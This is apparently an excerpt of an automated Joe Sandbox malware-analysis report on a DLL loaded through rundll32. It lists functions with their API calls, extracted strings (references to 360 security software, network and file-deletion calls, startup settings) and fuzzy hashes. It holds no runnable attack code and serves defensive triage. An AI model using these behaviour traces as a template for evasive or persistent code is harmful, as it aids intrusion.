RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010BE9
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010C46
memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D0F
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010D31
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D3B

Strings

360scan, xrefs: 0000000180010BBB

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuememmove
String ID: 360scan
API String ID: 1121107697-2450673717
Opcode ID: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
Instruction ID: 8412be06b917c2556790a81d519247f335b1f81f587c3bd72331bc97ccab05af
Opcode Fuzzy Hash: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
Instruction Fuzzy Hash: B551F336700A4889FBA6CBB5E8107ED3760BB487E8F548215EEA917B95DF74C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018008023C Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180080256
_CxxThrowException.MSVCRT ref: 0000000180080276
_CxxThrowException.MSVCRT ref: 0000000180080296

Part of subcall function 000000018000EF8C: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000F01A

_CxxThrowException.MSVCRT ref: 00000001800802BA
_CxxThrowException.MSVCRT ref: 00000001800802DA
_CxxThrowException.MSVCRT ref: 00000001800802FA
??3@YAXPEAX@Z.MSVCRT ref: 0000000180080312

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow$??3@
String ID:
API String ID: 3542664073-0
Opcode ID: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
Instruction ID: f77bb453ddad34bb426a0367fc3509630a9405fc871705a0e6efaa82900c553f
Opcode Fuzzy Hash: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
Instruction Fuzzy Hash: 35216A72B00A88C9E75DFE33B8423EB6212ABD87C0F18D435BA594B69BDE25C5168740

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85745C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31nativefileCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00000187EC8574A2
NtOpenFile.NTDLL ref: 00000187EC8574D6
NtClose.NTDLL ref: 00000187EC8574F0

Strings

, xrefs: 00000187EC8574B2
@, xrefs: 00000187EC857482
0, xrefs: 00000187EC85748D

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseFileInitOpenStringUnicode
String ID: $0$@
API String ID: 3719522541-2347541974
Opcode ID: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
Instruction ID: 79fc0853e7e2d0405e56120e84187ab56d41a0edd9e85895dc2dc8168e292a37
Opcode Fuzzy Hash: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
Instruction Fuzzy Hash: 5601DB76128A4086E750DF10E5943DBBB60F3C4794F604025E78A42AA8DFBDC689CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066C3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180066C52
GetLastError.KERNEL32 ref: 0000000180066C9D
IsDebuggerPresent.KERNEL32 ref: 0000000180066CB5
OutputDebugStringW.KERNEL32 ref: 0000000180066CC6

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000000180066CBF

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentStringmemset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 1848478996-631824599
Opcode ID: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
Instruction ID: 5420fd47393a03a9017ccb442b178d5ad27f9d1acba3036b184651f5d30fce96
Opcode Fuzzy Hash: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
Instruction Fuzzy Hash: FC117032710B4997F7869B22EE453E932A1FB58395F50C125E75982AA0EF3CD67CC710

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC858D90 Relevance: 7.6, APIs: 5, Instructions: 92networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00000187EC858DF7
InternetOpenUrlW.WININET ref: 00000187EC858E33
InternetCloseHandle.WININET ref: 00000187EC858F33
InternetCloseHandle.WININET ref: 00000187EC858F46

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen
String ID:
API String ID: 435140893-0
Opcode ID: 1ae38b70c00e5fa2b0baae9672864dfc4ebc490b6e9ea35561f34b789a8602ec
Instruction ID: 42ee4fc6c82b34e484a043c14a8510561296a5588ca18da0ba833f1416321ab0
Opcode Fuzzy Hash: 1ae38b70c00e5fa2b0baae9672864dfc4ebc490b6e9ea35561f34b789a8602ec
Instruction Fuzzy Hash: 0F41D67A229B8086E760CB15F59479EB3A1F3C5744F209056FB8A87B98CFBDC944CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180082A18 Relevance: 7.6, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180082A35
_CxxThrowException.MSVCRT ref: 0000000180082A55
_CxxThrowException.MSVCRT ref: 0000000180082A75
_CxxThrowException.MSVCRT ref: 0000000180082A95
_CxxThrowException.MSVCRT ref: 0000000180082AB8
_CxxThrowException.MSVCRT ref: 0000000180082ADB

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
Instruction ID: 0cc55a271704fcaf4879220f63c9cc24c35a4ef39e1216f676686ee34d186413
Opcode Fuzzy Hash: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
Instruction Fuzzy Hash: CE118471714A88C9E75EFE33A8027EB5312ABDC7C0F14D434B9894B65BCF25C6164300

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC857694 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00000187EC8576D1
NtDeleteFile.NTDLL ref: 00000187EC8576E6

Strings

0, xrefs: 00000187EC8576BC
@, xrefs: 00000187EC8576B4

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFileInitStringUnicode
String ID: 0$@
API String ID: 3559453722-1545510068
Opcode ID: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
Instruction ID: 9c40b04bc24342a232316623ead01d47a912d3299f7daca79542f3ce0f11a352
Opcode Fuzzy Hash: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
Instruction Fuzzy Hash: 6AF0177222868186D7209F00E49438FBBA4F7C0388FA08115E2CE46AA8CB7CC659CF04

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC851A08 Relevance: 6.1, APIs: 4, Instructions: 113fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00000187EC85AD34: NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

FindFirstFileA.KERNEL32 ref: 00000187EC851AC7
wsprintfA.USER32 ref: 00000187EC851B95
FindNextFileA.KERNEL32 ref: 00000187EC851BC2
FindClose.KERNEL32 ref: 00000187EC851BD5

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
String ID:
API String ID: 65906682-0
Opcode ID: 7544d8a013f7abd9b84a5d7f403609ff286104f35a45eb63b3216f6701f46496
Instruction ID: 1d7a8760dcb5764de547cff9fc8c0394c3b23039e25654c34a62f32cbdb2d79b
Opcode Fuzzy Hash: 7544d8a013f7abd9b84a5d7f403609ff286104f35a45eb63b3216f6701f46496
Instruction Fuzzy Hash: 55510F7A22CB8592EA60DB00E6D03DAB365F7D4384F608165E78D426E9EFBCD645CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180062600 Relevance: 5.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800626EE
memset.MSVCRT ref: 0000000180062710
memmove.MSVCRT ref: 00000001800627F5
memmove.MSVCRT ref: 0000000180062865

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: memmovememset
String ID:
API String ID: 1288253900-0
Opcode ID: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
Instruction ID: 53b279b989bf8eb66429a88fea8492b1387e1814281b1786c9cbc4725fb6e079
Opcode Fuzzy Hash: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
Instruction Fuzzy Hash: 56A1A273A146D48FD795CF79D8407AC7BE1F389788F548126EA9997B48EB38C205CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC857ACC Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00000187EC8577B0: RtlInitUnicodeString.NTDLL ref: 00000187EC85781B
Part of subcall function 00000187EC8577B0: NtCreateFile.NTDLL ref: 00000187EC857898

NtClose.NTDLL ref: 00000187EC857B2E

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileInitStringUnicode
String ID:
API String ID: 3299502662-0
Opcode ID: ba46e55e090a69e480c2f96100f762311f73f5923b28a719c166c648680e9e9a
Instruction ID: 00e5ffaae1208a3a13bf3d7e07196fef01a1047cb6481fe9cc4969012c5e3e38
Opcode Fuzzy Hash: ba46e55e090a69e480c2f96100f762311f73f5923b28a719c166c648680e9e9a
Instruction Fuzzy Hash: A5F0C476628680C6D720DB15E48164ABBB0F3C97C8F508255EBCC47AA9DB7DC6558F40

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC857704 Relevance: 1.5, APIs: 1, Instructions: 22filenativeCOMMON

Download Yara Rule

APIs

NtQueryInformationFile.NTDLL ref: 00000187EC85774D

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: FileInformationQuery
String ID:
API String ID: 365787318-0
Opcode ID: 098af84858ac3b4f52afb1f03821544a4055eeb608dc3f3c06a72dec3df0af55
Instruction ID: 5947f1e76498609f897c9527ca65185ebc7651f81100e21a5f808b5ce86e75aa
Opcode Fuzzy Hash: 098af84858ac3b4f52afb1f03821544a4055eeb608dc3f3c06a72dec3df0af55
Instruction Fuzzy Hash: 4DF0307533CA8482E7509B50E9817DEB760F7C1790FA0C065A68997BE8CFFCC6558B00

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85CB54 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL ref: 00000187EC85CB76

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2658e8e1e7c21a952095abd3ff06db641739bea2f09a4534dec18fc3291b33c3
Instruction ID: 29ed1dc98cf99f523704d832ed334544005d31b9516b4bf0e44dd53ac0661cac
Opcode Fuzzy Hash: 2658e8e1e7c21a952095abd3ff06db641739bea2f09a4534dec18fc3291b33c3
Instruction Fuzzy Hash: 04D0C776618680D7CB145F24E44514A7760F7D5304FD04519E68D45794DF3CC625CF04

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A2C8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32 ref: 000000018006A2F1

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
Instruction ID: 1e54cb40d621f6ee58c2f67f74a10768d1db0efbd2ae079103c51a30650bf8b3
Opcode Fuzzy Hash: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
Instruction Fuzzy Hash: 68D04276928B84CBD6A09B18F48430AB7A0F388794F501215EBCD46B29DB3CC2558F04

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC860A90 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7a9df2dbb13eb2e98b1a9a2e658d71a4f4976f5500f90c8609e5c0cdf5b47b
Instruction ID: 1c000b8f30fb169ffdb6dd9d03529f6c5ddd5c04bb2b90a60751753060258bf8
Opcode Fuzzy Hash: 5b7a9df2dbb13eb2e98b1a9a2e658d71a4f4976f5500f90c8609e5c0cdf5b47b
Instruction Fuzzy Hash: 6121956FA5E7C09BE3624A3418B91993FA09792E91B5DC0DBC7E0472C3DA0D4906C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC860AC0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c26a0eddbfe301acd4f0039df5c8d364bde11d0d6dc808c4ac8dcca47453a80
Instruction ID: c7f9e801abe34756fc08d75b5d5ecb2c9fb83c48118ad1ec27bcc481c5c31332
Opcode Fuzzy Hash: 9c26a0eddbfe301acd4f0039df5c8d364bde11d0d6dc808c4ac8dcca47453a80
Instruction Fuzzy Hash: 7C01846B98E7C09BE3934A3418A51D93F60D792E50B6D80DBC7E0872C3DA4C8946C75E

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC860A78 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7213c09629a48469e3517a3ac50102c0efa435750b8d701332e2331c66a56446
Instruction ID: 8bda1092eb6242ad79a646546b94d2b305f98ef56217018f56d4963833ae2dd4
Opcode Fuzzy Hash: 7213c09629a48469e3517a3ac50102c0efa435750b8d701332e2331c66a56446
Instruction Fuzzy Hash: FFC0127FB9EAD096F165452429B51D9298053E5F46B18C0EBC6D00B2C3A9054904D39D

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC860AF0 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caf28a5018ee83fc4d58185e6fae65bc1aa553a25b61252fac4c51139eb64ba1
Instruction ID: c04ac7e1eb3e76822ff934c4354a96a125ace0f5654085b6333574016fcd0e4b
Opcode Fuzzy Hash: caf28a5018ee83fc4d58185e6fae65bc1aa553a25b61252fac4c51139eb64ba1
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060FE0 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 126libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 0000000180061027
GetProcAddress.KERNEL32 ref: 0000000180061044
GetProcAddress.KERNEL32 ref: 0000000180061061
GetProcAddress.KERNEL32 ref: 000000018006107E
GetProcAddress.KERNEL32 ref: 000000018006109B
GetProcAddress.KERNEL32 ref: 00000001800610B8
GetProcAddress.KERNEL32 ref: 00000001800610D5
GetProcAddress.KERNEL32 ref: 00000001800610F2
GetProcAddress.KERNEL32 ref: 000000018006110F
GetProcAddress.KERNEL32 ref: 000000018006112C
GetProcAddress.KERNEL32 ref: 0000000180061149
GetProcAddress.KERNEL32 ref: 0000000180061166
GetProcAddress.KERNEL32 ref: 0000000180061183
GetProcAddress.KERNEL32 ref: 000000018006119C
GetProcAddress.KERNEL32 ref: 00000001800611B5
GetProcAddress.KERNEL32 ref: 00000001800611D1

Strings

sqlite3_bind_parameter_index, xrefs: 00000001800611E6
sqlite3_open16, xrefs: 000000018006101D
sqlite3_bind_int, xrefs: 00000001800610CE
sqlite3_column_text16, xrefs: 0000000180061142
sqlite3_close, xrefs: 000000018006103D
sqlite3_step, xrefs: 00000001800611AE
sqlite3_prepare16_v2, xrefs: 0000000180061077
sqlite3_column_int64, xrefs: 000000018006117C
sqlite3_reset, xrefs: 0000000180061094
sqlite3_bind_blob, xrefs: 00000001800610EB
sqlite3_column_bytes, xrefs: 00000001800611CA
sqlite3_finalize, xrefs: 0000000180061195
sqlite3_column_int, xrefs: 000000018006115F
sqlite3_bind_text16, xrefs: 0000000180061108
sqlite3_bind_int64, xrefs: 00000001800610B1
sqlite3_exec, xrefs: 000000018006105A
sqlite3_column_blob, xrefs: 0000000180061125

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID: sqlite3_bind_blob$sqlite3_bind_int$sqlite3_bind_int64$sqlite3_bind_parameter_index$sqlite3_bind_text16$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_open16$sqlite3_prepare16_v2$sqlite3_reset$sqlite3_step
API String ID: 190572456-2634604785
Opcode ID: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
Instruction ID: 5824c6e44f34b1b970dc4f09c8d16c86c5da5fb83a6df47551891ccc5cd06f94
Opcode Fuzzy Hash: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
Instruction Fuzzy Hash: D351A271201F4EA5EF968BA4E8913D833A1FB4CBD7F19D125A92D46364EF38C698C710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005AC40 Relevance: 45.7, APIs: 18, Strings: 8, Instructions: 242COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 000000018005AD27
VariantInit.OLEAUT32 ref: 000000018005AD40
VariantClear.OLEAUT32 ref: 000000018005AD67
VariantClear.OLEAUT32 ref: 000000018005AD72
VariantClear.OLEAUT32 ref: 000000018005AF35
VariantClear.OLEAUT32 ref: 000000018005AF40

Strings

propoganda, xrefs: 000000018005AE90
name, xrefs: 000000018005AD52
value, xrefs: 000000018005AD99
install_first_open, xrefs: 000000018005AE3C
//root/config/item, xrefs: 000000018005AC7D
pop_count, xrefs: 000000018005AEAC
update_first_open, xrefs: 000000018005AE57
tray_startup, xrefs: 000000018005AE73

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Variant$Clear$Init
String ID: //root/config/item$install_first_open$name$pop_count$propoganda$tray_startup$update_first_open$value
API String ID: 3740757921-2166998829
Opcode ID: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
Instruction ID: aff580d4b75deea64deb7e46e4065f56afbdc634fa72071d76af76b76e89fc57
Opcode Fuzzy Hash: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
Instruction Fuzzy Hash: CDB12A72705A09DAFB95CF65D8903EC27B0FB49B99F149421FA0EA3A64DF35CA48C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006442C Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 170libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180064485
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018006448F
GetLastError.KERNEL32 ref: 000000018006449C
EnterCriticalSection.KERNEL32 ref: 00000001800644C5
memset.MSVCRT ref: 00000001800644DB
GetModuleFileNameW.KERNEL32 ref: 00000001800644F4
PathAppendW.SHLWAPI ref: 0000000180064508
PathAppendW.SHLWAPI ref: 000000018006451C
GetProcAddress.KERNEL32 ref: 0000000180064549
GetProcAddress.KERNEL32 ref: 000000018006455E
GetProcAddress.KERNEL32 ref: 0000000180064573
GetProcAddress.KERNEL32 ref: 0000000180064588
GetProcAddress.KERNEL32 ref: 000000018006459D
memset.MSVCRT ref: 00000001800645E5
FreeLibrary.KERNEL32 ref: 0000000180064691
LeaveCriticalSection.KERNEL32 ref: 00000001800646A3
??3@YAXPEAX@Z.MSVCRT ref: 00000001800646FD

Strings

QuerySetOption, xrefs: 0000000180064592
QueryFilesEx2, xrefs: 0000000180064568
QueryFileClose, xrefs: 0000000180064553
..\deepscan\, xrefs: 00000001800644FA
360util, xrefs: 0000000180064628
360Safe, xrefs: 000000018006460E
QueryFileCancel, xrefs: 000000018006457D
cloudcom2.dll, xrefs: 000000018006450E
QueryFileCreate, xrefs: 000000018006453F

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$CriticalSectionmemset$AppendPath$??3@CountEnterErrorFileFreeInitializeLastLeaveLibraryModuleNameSpin
String ID: ..\deepscan\$360Safe$360util$QueryFileCancel$QueryFileClose$QueryFileCreate$QueryFilesEx2$QuerySetOption$cloudcom2.dll
API String ID: 1015768321-2684063875
